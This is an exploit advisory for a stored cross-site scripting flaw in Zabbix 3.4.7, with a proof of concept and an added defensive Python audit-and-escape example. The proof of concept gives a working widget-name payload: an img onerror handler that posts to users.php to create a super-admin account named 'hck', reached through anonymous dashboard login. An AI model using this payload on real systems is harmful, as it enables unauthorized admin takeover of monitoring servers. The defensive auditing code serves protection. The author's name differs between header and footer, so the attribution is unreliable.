|===========================================================================
| # Exploit Title : Zabbix 3.4.7 - Stored Cross-Site Scripting (XSS)
|
| # Author : Ali Seddigh
|
| # Category : Web Application
|
| # Vendor Homepage : https://www.zabbix.com/
|
| # Software Link : https://www.zabbix.com/rn/rn3.4.7
|
| # Tested on : [ Windows ~> 10 ]
|
| # Version : V 3.4.7
|
| # Date : 2021-04-06
|===========================================================================
| # Proof of Concept :
|
| 1- Go to /zabbix/zabbix.php?action=dashboard.list (anonymous login CVE-2019-17382)
| 2- Create new dashboard
| 3- Add a new widget => Type: Map navigation tree
| 4- Paste into parameter "Name": <img src="x" onerror="var n='hck',q=jQuery;q.post('users.php',{sid:q('#sid').attr('value'),form:'Create+user',alias:n,name:n,surname:n,'user_groups[]':7,password1:n,password2:n,theme:'default',refresh:'9s',rows_per_page:9,url:'',user_type:3,add:'Add'});">
| 5- Click the "Add" button
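| The root cause above is a widget "Name" value being placed into HTML without output encoding. The following is an added defender-side example, not code from the advisory or from Zabbix: it audits stored widget names for markup and inline event handlers (the marker of this payload class), and shows that HTML-escaping the name on output leaves nothing for the browser to execute. The widget names are constructed samples.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample widget names, not taken from any real Zabbix instance.
SAMPLE_WIDGET_NAMES = [
    "Core switches",
    '<img src="x" onerror="alert(1)">',   # stand-in for the payload class above
    "Datacenter <b>A</b>",
]

# Any attribute named on<something> (onerror, onload, ...) is an inline handler.
EVENT_ATTR = re.compile(r"^on[a-z]+$", re.IGNORECASE)


class _TagAuditor(HTMLParser):
    """Records every tag and inline event-handler attribute seen in a value."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        for attr_name, _ in attrs:          # attrs is a list of (name, value)
            if EVENT_ATTR.match(attr_name):
                self.handlers.append(f"{tag}@{attr_name}")


def audit_widget_name(name: str) -> dict:
    """Flag a stored widget name that carries markup able to run script."""
    auditor = _TagAuditor()
    auditor.feed(name)
    auditor.close()
    suspicious = bool(auditor.handlers) or "script" in auditor.tags
    return {"name": name, "tags": auditor.tags,
            "handlers": auditor.handlers, "suspicious": suspicious}


def render_widget_name(name: str) -> str:
    """Output-encode the name for an HTML context; the fix the page's bug needs."""
    return html.escape(name, quote=True)


if __name__ == "__main__":
    for widget_name in SAMPLE_WIDGET_NAMES:
        print(audit_widget_name(widget_name), "->", render_widget_name(widget_name))
```

Run against an export of dashboard widget names, the audit flags the rows worth a closer look; the escaped form is what the template should emit.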
|===========================================================================
| # Discovered By : Ali Triplex
|===========================================================================